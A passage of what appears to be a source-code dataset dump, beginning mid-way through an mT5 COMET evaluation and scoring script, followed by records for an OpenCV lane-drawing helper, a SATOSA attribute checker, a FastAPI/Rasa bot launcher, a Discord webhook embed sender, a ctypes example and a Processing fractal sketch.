if exit_loop:\n break\n if model is not None:\n if True:\n queries = [x[\"query\"] for x in batch_list]\n hyps = batch_generate(model, tokenizer, queries, batch_size = gen_bs, gen_param=gen_param)\n else:\n batch,_ = next(dl_iter)\n if type(batch) == list:\n batch = batch[0]\n hyps = generate(model, tokenizer, batch, gen_param=gen_param, task_ids=task_ids)\n else:\n #hyps = islice(infile, len(queries))\n hyps = lines[l_count: l_count + bs]\n l_count += bs \n pbar.update(bs)\n for b, top_hyp in zip(batch_list, hyps):\n query = b[\"query\"]\n inp = b[\"event\"]\n tail = b[\"target\"]\n resp = b[\"resp\"]\n rel = \"h\" #b[\"rel\"]\n qid = step #b[\"index\"]\n repid = iid #b[\"rep\"]\n mlog.info(\"\\n%s/%s) query: %s\", step, len(test_set), query)\n mlog.info(\"\\nhyp: %s\",top_hyp)\n mlog.info(\"\\ntail: %s\",tail)\n mbp(1)\n data = {}\n if query != old_query:\n old_query = query\n iid += 1\n data[\"qid\"] = iid\n data[\"tid\"] = qid\n #rel_natural = relation_natural_mappings[rel][\"en-postfix\"] \n #rel_natural_pure = rel_natural.replace(\"{ph}\", \"\").strip()\n #top_hyp = top_hyp.replace(rel_natural_pure, \"\")\n blank = \"\"\n if \"\" in top_hyp:\n blank, top_hyp = top_hyp.split(\"\")\n if not blank: blank = \"EMPT\"\n mlog.info(\"hyp: %s\",top_hyp)\n resp_const = resp.split(tail)\n # constant words in target template\n affixes = []\n for rp in resp_const:\n affix = rp\n for const in resp_cost_toks:\n affix = affix.replace(const, \"\")\n if affix:\n affixes.append(affix.strip())\n\n for const in resp_cost_toks + affixes:\n top_hyp = top_hyp.replace(const, \"\")\n blank = blank.replace(const, \"\")\n mlog.info(\"hyp: %s\", top_hyp)\n top_hyp = top_hyp.strip()\n if not top_hyp:\n top_hyp = \"EMPT\"\n data[\"blank\"] = blank\n data[\"pred_text1\"] = str(top_hyp)\n data[\"prefix\"] = rel\n data[\"langs\"] = lang\n tail = re.sub(r'<.*?>','',tail)\n tail = tail.strip()\n data[\"target_text\"] = tail\n #if test_set.orig_df is None:\n # data[\"target_text\"] = tail\n input_text = re.sub(r'<.*?>','##',query)\n input_text = input_text.replace(\"\\n\", \"\")\n #if blank:\n # query = query.replace(\"\", 
\"[\" + blank + \"]\")\n # query = query.replace(\"\", \">>\" + top_hyp)\n #else:\n # query = query.replace(\"\", \">>\" + top_hyp)\n data[\"input_text\"] = inp\n data[\"query\"] = query \n data[\"resp\"] = resp\n _q = query.replace(\"<\", \"\\n<\", 1)\n _q = _q.replace(\">\", \">\\n\")\n data[\"prompt\"] = _q\n rows.append(data)\n pbar.update()\n step += 1\n\n df = pd.DataFrame(rows)\n #if test_set.orig_df is not None:\n # df = test_set.orig_df.merge(df, on=['prefix','input_text'], how='inner')\n for key, info in exp_info.items():\n if type(info) == list:\n info = \"@\".join(info)\n df[key] = info\n\n do_score(df, scorers, save_path)\n\nimport click\nfrom comet.utils.find_files import *\n\n@click.command()\n@click.option(\n \"--df_name\",\n \"-df\",\n default=\"full\",\n type=str,\n help=\"partial part of the filename (pattern)\"\n)\n@click.option(\n \"--path\",\n envvar=\"PWD\",\n # multiple=True,\n type=click.Path(),\n help=\"The current path (it is set by system)\"\n)\n@click.option(\n \"--scorers\",\n \"-sc\",\n default=\"st\",\n type=str,\n help=\"the name of scorers like rouge, bert or roug-bert to include both\"\n)\ndef do_score_w(df_name, path, scorers):\n files = find_files(df_name, path)\n for f in files:\n print(f)\n #r = input(f + \" score?\")\n if True: #r == \"y\":\n df = pd.read_table(f, low_memory=False)\n do_score(df, scorers, f)\n\nimport numpy as np\n#import tensorflow as tf\ndef run_sts_benchmark(batch, embed):\n sts_encode1 = tf.nn.l2_normalize(embed(tf.constant(batch['top'].tolist())), axis=1)\n sts_encode2 = tf.nn.l2_normalize(embed(tf.constant(batch['top_pred'].tolist())), axis=1)\n cosine_similarities = tf.reduce_sum(tf.multiply(sts_encode1, sts_encode2), axis=1)\n clip_cosine_similarities = tf.clip_by_value(cosine_similarities, -1.0, 1.0)\n scores = 1.0 - tf.acos(clip_cosine_similarities) / math.pi\n \"\"\"Returns the similarity scores\"\"\"\n return scores\n\ndef do_score(df, scorers, save_path, reval=False):\n #try:\n # nltk_path = str(nltk.data.find(\"tokenizers/punkt\"))\n # mlog.info(f\"using nltk from: {nltk_path}\")\n #except LookupError:\n # nltk.download('punkt')\n if \"st\" in scorers:\n embed = tf.saved_model.load(\"/home/pouramini/pret/sm\")\n\n base_path = \"/content/drive/MyDrive/pret\"\n if not colab:\n base_path = os.path.join(home, \"pret\")\n local_path = f\"{base_path}/paraphrase-MiniLM-L6-v2\"\n if not Path(local_path).exists():\n local_path = 'sentence-transformers/paraphrase-MiniLM-L6-v2'\n\n bert_scorer = None\n bert_metric = None\n if \"bert\" in scorers:\n bert_scorer = SentenceTransformer(local_path)\n bert_metric = load_metric(\"bertscore\")\n\n rouge_scorer = None\n if \"rouge\" in scorers:\n rouge_scorer = Rouge()\n\n local_path = f\"{base_path}/nli-roberta-base-v2\"\n if not Path(local_path).exists():\n local_path = 'sentence-transformers/nli-roberta-base-v2'\n nli_model = None\n if \"nli\" in scorers:\n nli_model = CrossEncoder(local_path)\n nli_counter = {}\n for l in nli_map:\n nli_counter[l] = 0\n counter = {\"all\":0}\n sum_match = {\"all\":0} \n mean_match = {}\n sum_bert = {\"all\":0} \n mean_bert = {}\n sum_rouge = {\"all\":0}\n mean_rouge = {}\n sum_bleu = {\"all\":0}\n mean_bleu = {}\n new_results = {}\n smoothie = SmoothingFunction().method4 # a function for smooth\n hyp_counter = [0]*5\n\n all_predictions = []\n all_golds = []\n if not reval:\n mlog.info(\"Preparing iterator ...\")\n mlog.info(\"Scoring....\")\n if scorers:\n rows = []\n pbar = tqdm(total=len(df), position=0, leave=True) #,dynamic_ncols=True)\n for step, 
row in df.iterrows():\n data = {}\n rel = row[\"prefix\"]\n lang = row[\"langs\"] \n scope = rel + \"_\" + lang\n if not scope in sum_bert: \n sum_bert[scope] = 0\n sum_rouge[scope] = 0\n sum_bleu[scope] = 0\n sum_match[scope] = 0\n counter[scope] = 0\n #mlog.debug(\"&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\")\n gen_token = gen_tokens[lang]\n #Compute embeddings\n top_hyp = str(row[\"pred_text1\"])\n preds = [top_hyp]\n inp = row[\"input_text\"]\n tail = re.sub(r'','',str(row[\"target_text\"]))\n tail = tail.strip()\n tails = [tail]\n all_predictions.append(top_hyp)\n all_golds.append(tails[0])\n hi, ri = 0, 0\n hi, ri, cur_score = bert_score(bert_scorer, preds, tails)\n #summary = bert_score2(bert_metric, preds, tails)\n #cur_score = summary[\"bertscore_f1\"]\n best_hyp = preds[hi]\n best_ref = tails[ri]\n hyp_counter[hi] += 1\n if nli_model:\n pair = (best_hyp, best_ref)\n nli_scores = nli_model.predict(pair) \n _max = nli_scores.argmax()\n label = nli_map[_max]\n nli_counter[label] += 1\n data[\"nli_group\"] = label\n data[\"top\"] = best_ref\n data[\"all_preds\"] = \"
\".join(preds) \n data[\"top_pred\"] = best_hyp\n if \"bert_score\" in df and reval:\n df.at[step, \"bert_score\"] = float(\"{:.2f}\".format(cur_score))\n else:\n data[\"bert_score\"] = float(\"{:.2f}\".format(cur_score))\n sum_bert[scope] += cur_score\n sum_bert[\"all\"] += cur_score\n counter[scope] += 1\n counter[\"all\"] += 1\n mean_bert[scope] = \"{:.4f}\".format(sum_bert[scope] / counter[scope])\n mean_bert[\"all\"] = \"{:.4f}\".format(sum_bert[\"all\"] / counter[\"all\"])\n #### BLUE score\n #tokenized_rs = []\n #for r in tails:\n # tokenized_rs.append(word_tokenize(r))\n #hypo = word_tokenize(top_hyp)\n bleu_score = 0.0\n #try:\n # bleu_score = sentence_bleu(tokenized_rs, hypo, smoothing_function=smoothie)\n #except ValueError: # TODO ZeroDivisionError\n # vlog.warning(\"math domain error in bleu, set to 0.0. generated sentence: {}\".format(hypo))\n data[\"bleu_score\"] = bleu_score \n sum_bleu[scope] += bleu_score \n mean_bleu[scope] = \"{:.4f}\".format(sum_bleu[scope] / counter[scope])\n #### Rouge score\n rouge_score = 0\n m_tails = \".\".join(tails)\n m_top_hyp = top_hyp\n if rel in rel_target_omits:\n omit = rel_target_omits[rel]\n m_top_hyp = top_hyp.replace(omit, \"\") \n m_tails = m_tails.replace(omit,\"\")\n if rouge_scorer and m_top_hyp.strip() and m_tails.strip():\n rouge_score = rouge_scorer.get_scores(m_top_hyp, m_tails, \n avg=True, ignore_empty=True)\n rouge_score = rouge_score[\"rouge-l\"][\"f\"]\n match_score = 0\n inp_key = inp + rel\n mean_match[scope] = \"{:.4f}\".format(sum_match[scope] / counter[scope])\n\n data[\"rouge_score\"] = rouge_score\n sum_rouge[scope] += rouge_score\n sum_rouge[\"all\"] += rouge_score\n mean_rouge[scope] = \"{:.4f}\".format(sum_rouge[scope] / counter[scope])\n mean_rouge_all = sum_rouge[\"all\"] / counter[\"all\"]\n mean_rouge[\"all\"] = \"{:.4f}\".format(mean_rouge_all)\n pbar.set_description(f\"{scope:<20} :Bert:{mean_bert[scope]:<7} | {mean_bert['all']:<7} Rouge {mean_rouge[scope]:<7}|{mean_rouge['all']:<7} \")\n step += 1\n pbar.update()\n rows.append(data)\n\n df2 = pd.DataFrame(rows)\n if \"st\" in scorers:\n sts_data = df2[[\"top\",\"top_pred\"]]\n preds = df2[\"top_pred\"].to_list()\n tails = df2[\"top\"].to_list()\n berts = [0]*len(preds)\n rouges = [0]*len(preds)\n if \"bert\" in scorers:\n berts = df2[\"bert_score\"].to_list()\n if \"rouge\" in scorers:\n rouges = df2[\"rouge_score\"].to_list()\n scores = []\n for batch in np.array_split(sts_data, 10):\n scores.extend(run_sts_benchmark(batch, embed))\n\n df2[\"st_score\"] = [\"{:.2f}\".format(float(x)) for x in scores]\n res = zip(scores, berts, rouges, preds, tails)\n for s, b, r, p, t in res:\n print(\"{:<5.2f} {:<5.2f} {:<5.2f}{:<20} {:<20}\".format(float(s),float(b),float(r),p,t))\n\n print(\"mean st score: %s\", np.mean(scores))\n print(\"mean bert score: %s\", np.mean(berts))\n print(\"mean rouge score: %s\", np.mean(rouges))\n\n if not reval:\n df = pd.concat([df, df2], axis=1)\n\n mlog.info(\"Saving results %s\", save_path)\n save_fname = now + \"_full_results.tsv\"\n if not save_path.endswith(\"tsv\"):\n save_path = os.path.join(save_path, save_fname) \n print(\"Saving results %s\", save_path)\n df.to_csv(save_path, index=False, sep=\"\\t\")\n \n for metric in [mean_rouge, mean_bert, mean_match, mean_bleu]:\n s =0 \n ii = 0\n jj = 0\n for key,val in metric.items():\n metric[key] = str(val) + \"--\" + str(counter[key])\n s += float(val)\n ii += 1\n jj += counter[key]\n metric[\"AVG\"] = \"{:.2f}--{}\".format(s/ii, jj)\n\n mean_bert_str = json.dumps(mean_bert, 
indent=2)\n mean_rouge_str = json.dumps(mean_rouge, indent=2)\n mean_bleu_str = json.dumps(mean_bleu, indent=2)\n mean_match_str = json.dumps(mean_match, indent=2)\n mlog.info(\"-----------------------------------------------------\")\n pbar.close()\n pred_counts = df['pred_text1'].unique()\n mlog.info(\"Pred counts\")\n vlog.info(\"Pred counts\")\n if len(pred_counts) < 100:\n for r in pred_counts:\n mlog.info(r)\n vlog.info(r)\n\n df_mean_rouge = df[\"rouge_score\"].mean()\n for logger in [mlog, vlog, clog]:\n logger.info(\"Len data frame: {}\".format(len(df)))\n logger.info(\"Rouge:{} \".format(mean_rouge_str)) \n logger.info(\"DF mean Rouge Score: {}\".format(df_mean_rouge))\n if \"bert\" in scorers:\n logger.info(\"BERT:{} \".format(mean_bert_str)) \n logger.info(\"DF mean Bert Score: {}\".format(df[\"bert_score\"].mean()))\n #logger.info(\"nli_counter: {}\".format(nli_counter))\n #logger.info(\"hyp_counter: {}\".format(hyp_counter))\n logger.info(\"Distinct preds:{}\".format(len(pred_counts)))\n\n return df\n\ndef write_results(exp_info, save_path, df): \n _info = \"_\".join([str(x) for x in list(exp_info.values())])\n #metric_list = [\"rouge\", \"meteor\", \"bertscore\"]\n #summary = calc_metrics(all_predictions, all_golds, metric_list)\n summary = \"\"\n out = os.path.join(save_path,f\"summary__{_info}.txt\")\n print(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\n print(summary)\n with open(out, \"w\") as f:\n print(summary, file=f)\n print(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\n if not scorers:\n return\n\n\n df = df.sort_values(by=[\"input_text\"])\n \n out = os.path.join(save_path,f\"__{_info}.txt\")\n def write_preds(df, out):\n handler = logging.FileHandler(out, mode=\"w\")\n mlog.addHandler(handler)\n old_input = \"\"\n for i, row in df.iterrows(): \n q = row[\"input_text\"] \n p = row[\"prefix\"]\n if q != old_input:\n old_input = q\n mlog.info(\"\\n\\n\")\n mlog.info(\"\\n\")\n mlog.info(\"{:<2} {} {:<60}:\".format(i, q, p))\n preds = row[\"all_preds\"]\n answers = row[\"target_text\"]\n mlog.info(\"------------------------------------ preds for {}:\".format(p))\n for pred in preds.split(\"
\"):\n mlog.info(\"{:<60}:\".format(pred))\n mlog.info(\"----------------------------------- targets for {}:\".format(p))\n for ans in answers.split(\"
\"):\n mlog.info(\"{:<60}:\".format(ans))\n\n\n\ndef bert_score2(metric, preds, golds):\n summary = {}\n preds = [p.strip() for p in preds]\n golds = [g.strip() for g in golds]\n res = metric.compute(predictions=preds, references=golds, lang=\"en\", model_type=\"/home/pouramini/pret/paraphrase-MiniLM-L6-v2\", num_layers=6)\n #res = metric.compute(predictions=preds, references=golds, lang=\"en\", model_type=\"/home/pouramini/pret/t5-large\", num_layers=24)\n for k, v in res.items():\n if k == \"hashcode\":\n continue\n summary[f\"bertscore_{k}\"] = round(1.0 * sum(v) / len(v), 2)\n return summary\n\n\ndef calc_metrics(preds, golds, metric_list):\n summary = {}\n for metric_name in metric_list:\n metric = load_metric(metric_name)\n processed_preds, processed_golds = postprocess_text(preds, golds, metric_name)\n\n if metric_name == \"bertscore\":\n res = metric.compute(predictions=preds, references=golds, lang=\"en\", model_type=\"/home/pouramini/pret/paraphrase-MiniLM-L6-v2\", num_layers=6)\n for k, v in res.items():\n if k == \"hashcode\":\n continue\n summary[f\"{metric_name}_{k}\"] = round(1.0 * sum(v) / len(v), 2)\n\n else:\n res = metric.compute(predictions=processed_preds, references=processed_golds)\n if metric_name == \"sacrebleu\":\n summary[metric_name] = res[\"score\"] * 0.01 # limit it to range of [0, 1] for unifying\n elif metric_name == \"bleurt\":\n summary[\"bleurt\"] = round(1.0 * sum(res[\"scores\"]) / len(res[\"scores\"]), 2)\n elif metric_name == 'rouge':\n for sub_metric_name in res.keys():\n for i, key in enumerate(['precision', 'recall', 'fmeasure']):\n summary[\"{}_{}\".format(sub_metric_name, key)] = res[sub_metric_name][1][i]\n # this the the fmeasure('f-score') from the mid('mean aggregation')\n else:\n summary[metric_name] = res[metric_name]\n return summary\n\ndef acc_metric(tokenizer, all_preds, all_labels, save_path=\"\"):\n acc = sum([int(p == l) for p, l in zip(all_preds, all_labels)]) / len(all_preds)\n \n if save_path:\n with open(os.path.join(save_path, \"{}.txt\".format(acc)), \"w\") as f:\n for p, l in zip(all_preds, all_labels):\n f.write(str(p) + \"\\t\\t\" + str(l) + \"\\n\")\n if isinstance(p, list):\n f.write(tokenizer.decode(p) + \"\\t\\t\" + tokenizer.decode(l) + \"\\n\")\n f.write(\"\\n\")\n\n return acc\n\n\ndef acc_f1_metric(tokenizer, all_preds, all_labels, save_path=\"\"):\n f1_macro = f1_score(all_labels, all_preds, average=\"macro\")\n acc = sum([int(p == l) for p, l in zip(all_preds, all_labels)]) / len(all_preds)\n\n if save_path:\n with open(os.path.join(save_path, \"{}.txt\".format(f1_macro)), \"w\") as f:\n for p, l in zip(all_preds, all_labels):\n f.write(str(p) + \"\\t\\t\" + str(l) + \"\\n\")\n if isinstance(p, list):\n f.write(tokenizer.decode(p) + \"\\t\\t\" + tokenizer.decode(l) + \"\\n\")\n f.write(\"\\n\")\n\n return [acc, f1_macro]\n\n\nif __name__ == \"__main__\":\n do_score_w()\n","repo_name":"puraminy/mt5-comet","sub_path":"comet/train/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":34931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40885696261","text":"import numpy as np\nimport cv2\nimport lines\n\ndef draw_lane(img, warped_img, left_points, right_points, Minv):\n # Create an image to draw the lines on\n warp_zero = np.zeros_like(warped_img).astype(np.uint8)\n color_warp = np.dstack((warp_zero, warp_zero, warp_zero))\n\n # Recast the x and y points into usable format for cv2.fillPoly()\n left_fitx = left_points[0]\n right_fitx = 
right_points[0]\n ploty = left_points[1]\n\n pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n pts = np.hstack((pts_left, pts_right))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))\n\n # Warp the blank back to original image space using inverse perspective matrix (Minv)\n newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0])) \n\n # Combine the result with the original image\n return cv2.addWeighted(img, 1, newwarp, 0.3, 0)\n\ndef add_metrics(img, leftx, rightx, xm_per_pix=3.7/800, ym_per_pix = 25/720): \n # Calculate radius of curvature\n curvature_rads = lines.curvature_radius(leftx=leftx, rightx=rightx, img_shape=img.shape,\n xm_per_pix=xm_per_pix, ym_per_pix=ym_per_pix)\n # Calculate car offset\n offsetx = lines.car_offset(leftx=leftx, rightx=rightx, img_shape=img.shape)\n\n # Display lane curvature\n out_img = img.copy()\n cv2.putText(out_img, 'Left lane line curvature: {:.2f} m'.format(curvature_rads[0]), \n (60, 60), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,255,255), 5)\n cv2.putText(out_img, 'Right lane line curvature: {:.2f} m'.format(curvature_rads[1]), \n (60, 110), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,255,255), 5)\n \n # Display car offset\n cv2.putText(out_img, 'Horizontal car offset: {:.2f} m'.format(offsetx), \n (60, 160), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,255,255), 5)\n \n return out_img","repo_name":"jeremyscatigna/advance_lanelines_finding","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11512074421","text":"# 예제 파일 이름을 pickle.py로 하면 AttributeError 발생 가능\nimport pickle\n\n# pickle 은 파이썬에 특화된 binary_file이다\n\n# pickle write binary\nf = open(\"file_handling/log/list.pickle\", \"wb\")\ntest = [1,2,3,4,5]\npickle.dump(test, f)\nf.close()\n\n# # pickle read binary\nf = open(\"file_handling/log/list.pickle\", \"rb\")\ntest_pickle = pickle.load(f)\nprint(test_pickle)\nf.close()\n","repo_name":"updaun/PythonBasic","sub_path":"file_handling/pickle_example.py","file_name":"pickle_example.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27488242716","text":"import sys\nsys.dont_write_bytecode = True\n\n\nimport uvicorn\nfrom fastapi import FastAPI\n\nimport nltk\nnltk.download('punkt')\nnltk.download('wordnet')\nnltk.download('averaged_perceptron_tagger')\nnltk.download('vader_lexicon')\n\nfrom rasa.utils.endpoints import EndpointConfig\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom rasa.core.http_interpreter import RasaNLUHttpInterpreter\n\nfrom router.router import router\nfrom core.config import settings\nfrom bots import server_dialogflow\nfrom service.loadAllModel import load_all_models\nfrom service.createCustomActionFile import create_file_custom_action\n\ndef get_application() -> FastAPI:\n application = FastAPI()\n application.add_middleware(\n CORSMiddleware,\n allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n http_interpreter = RasaNLUHttpInterpreter(EndpointConfig(\n url = settings.RASA_BOT_ENDPOINT,\n params = {},\n headers = {\n \"Content-Type\": \"application/json\",\n },\n basic_auth=None,\n ))\n \n 
application.include_router(router, prefix=settings.API_PREFIX)\n    application.include_router(server_dialogflow.router)\n\n    # create_file_custom_action()\n    # load_all_models()\n    \n    return application\n\napp = get_application()\nif __name__ == '__main__':\n    uvicorn.run(\"main:app\", port=8000, reload = True)\n","repo_name":"Social-Listenning/Social_Listening_Bot","sub_path":"Bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"463389002","text":"from collections import defaultdict\nfrom logging import getLogger as get_logger\n\nfrom jinja2 import Environment\nfrom jinja2 import FileSystemLoader\nfrom jinja2 import select_autoescape\n\nfrom satosa.exception import SATOSAError\nfrom satosa.micro_services.base import ResponseMicroService\nfrom satosa.response import Unauthorized as UnauthorizedResponse\n\n\nlogger = get_logger(__name__)\n\n\nclass AttributeCheckerError(SATOSAError):\n    pass\n\n\nclass AttributeChecker(ResponseMicroService):\n    def __init__(self, config, internal_attributes, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.state_result = config[\"state_result\"]\n        self.attributes_strategy = {'all': all, 'any': any}[config.get(\"attributes_strategy\", \"all\")]\n        self.attribute_values_strategy = {'all': all, 'any': any}[config.get(\"attribute_values_strategy\", \"any\")]\n        self.user_id_attribute = config[\"user_id_attribute\"]\n\n        required_attributes_per_service = {}\n        for item in config.get(\"required_attributes_per_service\", []):\n            services = item.get(\"services\")\n            allowed_attributes = item.get(\"allowed_attributes\")\n            if services is None or allowed_attributes is None:\n                logger.warning(\"services or allowed_attributes missing\")\n                continue\n            for service in services:\n                required_attributes = required_attributes_per_service.get(\n                    service, defaultdict(set)\n                )\n                for k, v in allowed_attributes.items():\n                    required_attributes[k].update(v)\n                required_attributes_per_service[service] = required_attributes\n\n        # the attributes for the \"default\" service are added for all services\n        self.default_attributes = dict(\n            required_attributes_per_service.get(\"default\", {})\n        )\n        for k, v in self.default_attributes.items():\n            for required_attributes in required_attributes_per_service.values():\n                required_attributes[k].update(v)\n\n        self.required_attributes_per_service = {\n            k: dict(v) for k, v in required_attributes_per_service.items()\n            if k != \"default\"\n        }\n\n        templates_dir_path = config[\"templates_dir_path\"]\n        self.tpl_env = Environment(loader=FileSystemLoader(templates_dir_path), autoescape=select_autoescape())\n\n    def process(self, context, internal_data):\n        try:\n            allowed_attributes = self.required_attributes_per_service.get(\n                internal_data.requester, self.default_attributes\n            )\n            if not allowed_attributes:\n                raise AttributeCheckerError(\n                    \"No allowed attributes configured for %s\", internal_data.requester\n                )\n            return self._process(context, internal_data, allowed_attributes)\n        except AttributeCheckerError as e:\n            context.state[self.state_result] = False\n            context.state.delete = True\n            logger.warning(e)\n\n            requester = internal_data.requester\n            requester_md = internal_data.metadata.get(requester)\n            issuer = internal_data.auth_info.issuer\n            issuer_md = internal_data.metadata.get(issuer)\n            user_id = internal_data.attributes.get(self.user_id_attribute, [None])[0]\n\n            template = self.tpl_env.get_template(\"error-access.html.jinja2\")\n            
content = template.render(\n attrs=internal_data.attributes,\n requester=requester,\n requester_md=requester_md,\n issuer=issuer,\n issuer_md=issuer_md,\n user_id=user_id,\n )\n return UnauthorizedResponse(content)\n\n def _process(self, context, internal_data, allowed_attributes):\n context.state[self.state_result] = False\n is_authorized = self.attributes_strategy(\n self.attribute_values_strategy(\n value in values\n for value in internal_data.attributes.get(attr, [])\n )\n for attr, values in allowed_attributes.items()\n )\n\n if not is_authorized:\n error_context = {\n 'message': 'User is not authorized to access this service.',\n 'allowed_attributes': list(allowed_attributes.keys()),\n 'attributes': internal_data.attributes.keys(),\n 'attributes_strategy': self.attributes_strategy.__name__,\n 'attribute_values_strategy': self.attribute_values_strategy.__name__,\n }\n raise AttributeCheckerError(error_context)\n\n context.state[self.state_result] = True\n return super().process(context, internal_data)\n","repo_name":"SUNET/swamid-satosa","sub_path":"src/swamid_plugins/attributes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5678328034","text":"import requests\r\nprint(\"\"\"\r\n\r\n███████╗███╗░░░███╗██████╗░███████╗██████╗░██╗░░██╗░█████╗░░█████╗░██╗░░██╗\r\n██╔════╝████╗░████║██╔══██╗██╔════╝██╔══██╗██║░░██║██╔══██╗██╔══██╗██║░██╔╝\r\n█████╗░░██╔████╔██║██████╦╝█████╗░░██║░░██║███████║██║░░██║██║░░██║█████═╝░\r\n██╔══╝░░██║╚██╔╝██║██╔══██╗██╔══╝░░██║░░██║██╔══██║██║░░██║██║░░██║██╔═██╗░\r\n███████╗██║░╚═╝░██║██████╦╝███████╗██████╔╝██║░░██║╚█████╔╝╚█████╔╝██║░╚██╗\r\n╚══════╝╚═╝░░░░░╚═╝╚═════╝░╚══════╝╚═════╝░╚═╝░░╚═╝░╚════╝░░╚════╝░╚═╝░░╚═╝ \r\n\r\n\"\"\")\r\nurl = input(\"URL of the WebHook: \")\r\nembed = {}\r\nembedtitle = input(\"Embed Title: \")\r\nembed[\"title\"] = embedtitle\r\nembeddesc = input(\"Embed Description: \")\r\nembed[\"description\"] = embeddesc\r\nwhile True: #Thumbnail (optional)\r\n thumbnailornot = input(\"Willing to add an image? (S/n): \")\r\n if thumbnailornot.lower() == 's':\r\n embedthumbnailurl = input(\"URL Of the Image: \")\r\n embed['thumbnail'] = {\"url\": embedthumbnailurl}\r\n break\r\n elif thumbnailornot.lower() == 'n':\r\n break\r\n else:\r\n print(\"Please select a valid option; 'S' or 'n' :\")\r\nembedfieldnum = input(\"How many fields for your embed? 
(Put a number, 0 for none): \")\r\ntry: embedfieldnum = int(embedfieldnum)\r\nexcept: embedfieldnum = 0; print(\"You were supposed to put a number, we will assume you meant 0\")\r\nif embedfieldnum != 0:\r\n    embed['fields'] = []\r\n    for fieldnum in range(embedfieldnum):\r\n        fieldtitle = input(\"Field {} Title: \".format(fieldnum+1))\r\n        fieldtext = input(\"Field {} Content: \".format(fieldnum+1))\r\n        embed['fields'].append({\"name\":fieldtitle,\"value\":fieldtext})\r\nembedcolor = input(\"Hex Color of the Embed (6 Digits): \")\r\nembedcolor = int(embedcolor, 16)\r\nembed[\"color\"] = embedcolor\r\nprint(embed)\r\ndata = {\"embeds\": [embed]}\r\nrequests.post(url,json=data)\r\n","repo_name":"5R7/EmbedHook","sub_path":"EmbedHook.py","file_name":"EmbedHook.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"29183851938","text":"#!/usr/bin/python\n# coding:utf-8\nimport ctypes\nfrom ctypes import *\nimport os\n\n\"\"\"\nCall a dynamic link library directly with ctypes; not tested on Python 3\n\"\"\"\n\n# The argument is the absolute path of the generated .so file\nlibtest = ctypes.cdll.LoadLibrary(os.getcwd() + '/linuxany.so')\n# If the argument is a char* or an int, the function can be called directly\nprint(libtest.display('Hello,I am linuxany.com'))\n\n# For other argument types, set the argument types first, then allocate a buffer and pass it in\nmyGetData = libtest.getData\npData = ctypes.POINTER(ctypes.c_ubyte)\nmyGetData.argtypes = [pData]\nbuffersize = 1024 * 1024 * 20\n# Allocate the buffer\ndata = (buffersize * ctypes.c_ubyte)()\n# Make the call\nmyGetData(data)\n\nprint(type(data))\nprint(data[0])\n# Type conversion\nstrData = string_at(data, buffersize)\nprint(len(strData))\n","repo_name":"uncleheart/PublicFunction","sub_path":"python/system/Library/linuxsotest.py","file_name":"linuxsotest.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"6686499561","text":"def setup():\n    size(1024, 768)\n    background(89, 91, 92)\n    frameRate(10)\n\na = 100\nb = 50\ntheta = 0\nangle = 0\nz = 100\n\ndef draw():\n    triangleVersion()\n    \ndef triangleVersion():\n    global angle, z\n    stroke(233, 240, 170)\n    strokeWeight(0.1)\n    noFill()\n    translate(width/2, height/2)\n    scale(4, -4)\n    rotate(angle)\n    triangle(-z, 0, z, 0, 1/2*z, z)\n    z = sqrt(3)*z/2\n    angle = angle + atan(1/sqrt(3))\n    \ndef rectangleVersion():\n    frameRate(5)\n    global theta, a, b\n    stroke(233, 240, 170)\n    fill(233, 240, 170, 3)\n    translate(width/2, height/2)\n    scale(1, -1)\n    rotate(theta)\n    strokeWeight(4)\n    point(a, 0)\n    point(0, b)\n    strokeWeight(1)\n    rect(0, 0, a, b)\n    a = sqrt(a**2 + b**2)\n    theta = theta + atan(b/a)\n    s = (b**2)/a\n    b = sqrt(b**2 - s**2)\n","repo_name":"fcrb/ProcessingGit","sub_path":"Processing2/jamiesFractalPython/jamiesFractalPython.pyde","file_name":"jamiesFractalPython.pyde","file_ext":"pyde","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
